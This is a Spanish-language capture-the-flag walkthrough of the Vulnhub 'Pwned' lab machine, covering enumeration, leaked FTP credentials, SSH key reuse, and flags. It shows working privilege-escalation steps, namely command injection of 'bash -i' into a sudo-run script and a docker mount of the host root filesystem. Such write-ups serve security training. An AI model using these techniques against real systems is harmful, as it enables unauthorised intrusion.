[VLN] Pwned

Hoy vamos a hackear la maquina de Vulnhub llamada Pwned. Podeis descargarla desde el siguiente enlace: https://www.vulnhub.com/entry/pwned-1,507/
  • Video
  • Enumeration
  • Empezamos con un nmap para ver que puertos tiene abiertos.
    ~ > nmap -A -p- 192.168.1.93 13s Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-10 17:04 CEST Nmap scan report for pwned.home (192.168.1.93) Host is up (0.0011s latency). Not shown: 65532 closed ports PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 3.0.3 22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0) | ssh-hostkey: | 2048 fe:cd:90:19:74:91:ae:f5:64:a8:a5:e8:6f:6e:ef:7e (RSA) | 256 81:32:93:bd:ed:9b:e7:98:af:25:06:79:5f:de:91:5d (ECDSA) |_ 256 dd:72:74:5d:4d:2d:a3:62:3e:81:af:09:51:e0:14:4a (ED25519) 80/tcp open http Apache httpd 2.4.38 ((Debian)) |_http-server-header: Apache/2.4.38 (Debian) |_http-title: Pwned....!! Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 13.09 seconds
    Exploramos un poco mas el puerto 80 a ver que vemos.
    ~ > gobuster dir -u 192.168.1.93 -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-big.txt =============================================================== Gobuster v3.0.1 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_) =============================================================== [+] Url: http://192.168.1.93 [+] Threads: 10 [+] Wordlist: /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-big.txt [+] Status codes: 200,204,301,302,307,401,403 [+] User Agent: gobuster/3.0.1 [+] Timeout: 10s =============================================================== 2020/07/10 17:27:57 Starting gobuster =============================================================== /nothing (Status: 301) /hidden_text (Status: 301) /server-status (Status: 403)
    Encontramos el directorio hidden_text. Al visitar http://192.168.1.93/hidden_text vemos que hay un fichero, secret.dic que contiene:
    /hacked /vanakam_nanba /hackerman.gif /facebook /whatsapp /instagram /pwned /pwned.com /pubg /cod /fortnite /youtube /kali.org /hacked.vuln /users.vuln /passwd.vuln /pwned.vuln /backup.vuln /.ssh /root /home
    Nos descargamos el fichero secret.dic
    wget http://192.168.1.93/hidden_text/secret.dic
    Una vez descargado, ejecutamos gobuster usando como diccionario el fichero secret.dic.
    ~/ctf/vulnhub/cybersploit > gobuster dir -u http://192.168.1.93 -w secret.dic =============================================================== Gobuster v3.0.1 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_) =============================================================== [+] Url: http://192.168.1.93 [+] Threads: 10 [+] Wordlist: secret.dic [+] Status codes: 200,204,301,302,307,401,403 [+] User Agent: gobuster/3.0.1 [+] Timeout: 10s =============================================================== 2020/07/10 17:31:52 Starting gobuster =============================================================== //pwned.vuln (Status: 301) =============================================================== 2020/07/10 17:31:52 Finished ===============================================================
    Vemos que aparece pwned.vuln Visitamos http://192.168.1.93/pwned.vuln/ y en el codigo fuente de la web podemos ver:
    // if (isset($_POST['submit'])) { // $un=$_POST['username']; // $pw=$_POST['password']; // // if ($un=='ftpuser' && $pw=='B0ss_B!TcH') { // echo "welcome" // exit(); // } // else // echo "Invalid creds" // }
    Nos logueamos en el ftp con esos credenciales. (ftpuser/B0ss_B!TcH)
    ~/ctf/vulnhub/cybersploit > ftp 192.168.1.93 Connected to 192.168.1.93. 220 (vsFTPd 3.0.3) Name (192.168.1.93:sml): ftpuser 331 Please specify the password. Password: 230 Login successful. Remote system type is UNIX. Using binary mode to transfer files. ftp> dir 200 PORT command successful. Consider using PASV. 150 Here comes the directory listing. drwxr-xr-x 2 0 0 4096 Jul 10 12:47 share 226 Directory send OK. ftp>
    Exploramos la carpeta share del ftp y nos descargamos su contenido.
    ftp> cd share 250 Directory successfully changed. ftp> ls 200 PORT command successful. Consider using PASV. 150 Here comes the directory listing. -rw-r--r-- 1 0 0 2602 Jul 09 15:05 id_rsa -rw-r--r-- 1 0 0 75 Jul 09 17:41 note.txt 226 Directory send OK. ftp> get id_rsa local: id_rsa remote: id_rsa 200 PORT command successful. Consider using PASV. 150 Opening BINARY mode data connection for id_rsa (2602 bytes). 226 Transfer complete. 2602 bytes received in 0.00 secs (3.8592 MB/s) ftp> get note.txt local: note.txt remote: note.txt 200 PORT command successful. Consider using PASV. 150 Opening BINARY mode data connection for note.txt (75 bytes). 226 Transfer complete. 75 bytes received in 0.00 secs (61.8078 kB/s)
    Vemos que esta el fichero id_rsa, el cual puede que sea una llave privada. Le damos los permisos apropiados...
    ~ > chmod 600 id_rsa
    Por otro lado tenemos el fichero note.txt
    ~ > cat note.txt Wow you are here ariana won't happy about this note sorry ariana :(
    Vemos que aparece el usuario "ariana" en la nota. Usamos el usuario ariana y la key id_rsa para ver si obtenemos una shell por ssh.
  • Low Shell
  • ~ > ssh -i id_rsa ariana@192.168.1.93 Linux pwned 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2+deb10u1 (2020-06-07) x86_64 The programs included with the Debian GNU/Linux system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright. Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. Last login: Fri Jul 10 13:03:23 2020 from 192.168.18.70 ariana@pwned:~$
  • user1.txt
  • ariana@pwned:~$ cat user1.txt congratulations you Pwned ariana Here is your user flag fb8d98be1265dd88bac522e1b2182140 Try harder.need become root
    Miramos si podemos utilizar sudo con el usuario ariana, y que podemos hacer...
    ariana@pwned:~$ sudo -l Matching Defaults entries for ariana on pwned: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin User ariana may run the following commands on pwned: (selena) NOPASSWD: /home/messenger.sh
    Bien, podemos ejecutar un script como el usuario selena. Miramos el script...
    ariana@pwned:~$ cat /home/messenger.sh #!/bin/bash clear echo "Welcome to linux.messenger " echo "" users=$(cat /etc/passwd | grep home | cut -d/ -f 3) echo "" echo "$users" echo "" read -p "Enter username to send message : " name echo "" read -p "Enter message for $name :" msg echo "" echo "Sending message to $name " $msg 2> /dev/null echo "" echo "Message sent to $name :) " echo ""
    Lo ejecutamos, y ponemos "bash -i" para obtener una shell como "selena" :)
    ariana@pwned:~$ sudo -u selena /home/messenger.sh Welcome to linux.messenger ariana: selena: ftpuser: Enter username to send message : bash -i Enter message for bash -i :bash -i Sending message to bash -i python3 -c 'import pty; pty.spawn("/bin/bash")' #NO SE VE selena@pwned:/home/ariana$ id uid=1001(selena) gid=1001(selena) groups=1001(selena),115(docker)
  • user2.txt
  • selena@pwned:~$ cat user2.txt 711fdfc6caad532815a440f7f295c176 You are near to me. you found selena too. Try harder to catch me
    Vemos que el usuario selena pertenece al grupo docker. Miramos que imagenes hay...
    selena@pwned:~$ docker images REPOSITORY TAG IMAGE ID CREATED SIZE privesc latest 09ae39f0f8fc 4 days ago 88.3MB e13ad046d435 4 days ago 88.3MB alpine latest a24bb4013296 5 weeks ago 5.57MB debian wheezy 10fcec6d95c4 16 months ago 88.3MB
    Montamos la raiz del sistema / en la imagen docker "privesc" y ejecutamos /bin/sh.
    selena@pwned:~$ docker run -v /:/mnt/fuckfs -ti 09ae39f0f8fc /bin/sh
    Ahora solo quedaria mirar la carpeta /root.
  • root.txt
  • # cd /mnt/fuckfs/root # ls root.txt # cat root.txt 4d4098d64e163d2726959455d046fd7c You found me. i dont't expect this (◎ . ◎) I am Ajay (Annlynn) i hacked your server left and this for you. I trapped Ariana and Selena to takeover your server :) You Pwned the Pwned congratulations :) share the screen shot or flags to given contact details for confirmation Telegram https://t.me/joinchat/NGcyGxOl5slf7_Xt0kTr7g Instgarm ajs_walker Twitter Ajs_walker
  • End
  • Y con esto ya seriamos root de la maquina :)